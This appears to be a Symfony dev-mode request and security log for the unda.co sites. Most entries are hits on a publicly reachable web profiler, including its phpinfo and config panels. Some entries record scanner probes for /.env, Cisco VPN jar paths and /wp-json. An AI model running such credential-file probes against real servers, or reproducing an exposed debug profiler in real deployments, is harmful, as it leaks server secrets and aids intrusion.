[2025-12-20 12:50:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=security","method":"GET"} []
[2025-12-20 12:50:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 12:52:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 12:59:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=db","method":"GET"} []
[2025-12-20 12:59:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 13:01:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=twig","method":"GET"} []
[2025-12-20 13:01:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 13:06:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=router","method":"GET"} []
[2025-12-20 13:06:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 13:06:20] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"5ebd67","_route":"_profiler_router"},"request_uri":"https://unda.co/_profiler/5ebd67/router","method":"GET"} []
[2025-12-20 13:08:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 13:09:41] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 13:10:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=validator","method":"GET"} []
[2025-12-20 13:10:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 13:13:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=time","method":"GET"} []
[2025-12-20 13:13:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 13:14:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=cache","method":"GET"} []
[2025-12-20 13:14:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 13:19:21] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10","method":"GET"} []
[2025-12-20 13:19:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10","method":"GET"} []
[2025-12-20 13:25:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e22341","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e22341","method":"GET"} []
[2025-12-20 13:25:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 13:27:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9727b6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9727b6?panel=form","method":"GET"} []
[2025-12-20 13:27:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 13:27:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 13:28:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-20 13:28:21] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 13:32:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=db","method":"GET"} []
[2025-12-20 13:32:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 13:36:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=logger","method":"GET"} []
[2025-12-20 13:36:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 13:39:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"567cce","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/567cce?panel=twig","method":"GET"} []
[2025-12-20 13:39:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 13:42:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=security","method":"GET"} []
[2025-12-20 13:42:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 13:55:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=request","method":"GET"} []
[2025-12-20 13:55:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 13:57:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aa0429","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aa0429?panel=cache","method":"GET"} []
[2025-12-20 13:57:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 13:59:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=config","method":"GET"} []
[2025-12-20 13:59:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 14:03:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c78c5b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c78c5b?panel=config","method":"GET"} []
[2025-12-20 14:03:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 14:06:04] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 14:06:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 14:06:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=form","method":"GET"} []
[2025-12-20 14:06:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 14:07:38] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b8d5e3","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/b8d5e3/search/results?ip=216.106.187.123&limit=10","method":"GET"} []
[2025-12-20 14:07:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10","method":"GET"} []
[2025-12-20 14:08:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=config","method":"GET"} []
[2025-12-20 14:08:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 14:09:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 14:12:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-20 14:12:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-20 14:13:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=exception","method":"GET"} []
[2025-12-20 14:13:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-20 14:18:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 14:18:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 14:19:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 14:20:55] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 14:20:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 14:20:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 14:20:55] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 14:20:55] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 14:20:55] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 14:20:55] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 14:21:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=cache","method":"GET"} []
[2025-12-20 14:21:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 14:25:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=swiftmailer","method":"GET"} []
[2025-12-20 14:25:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 14:30:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 14:31:02] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-20 14:34:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb","method":"GET"} []
[2025-12-20 14:34:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 14:35:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ab2g"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ab2g\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 14:35:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ab2h"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ab2h\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 14:35:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 14:35:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 14:35:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /teorema505"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /teorema505\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 14:35:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0): at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
[2025-12-20 14:36:23] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-20 14:36:31] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"675298","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/675298","method":"GET"} []
[2025-12-20 14:37:38] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 14:38:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 14:38:38] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"4fefff","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/4fefff","method":"GET"} []
[2025-12-20 14:43:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 14:43:18] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-20 14:46:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=cache","method":"GET"} []
[2025-12-20 14:46:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 14:59:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=request","method":"GET"} []
[2025-12-20 14:59:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 15:02:02] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 15:02:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-json" (from "http://web.unda.co/wp-json")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-json\" (from \"http://web.unda.co/wp-json\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 15:02:45] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 15:06:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 15:06:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2ce99c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2ce99c?panel=events","method":"GET"} []
[2025-12-20 15:06:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 15:06:36] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"639e42","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/639e42","method":"GET"} []
[2025-12-20 15:10:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b38511","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b38511?panel=db","method":"GET"} []
[2025-12-20 15:10:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 15:12:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0","method":"GET"} []
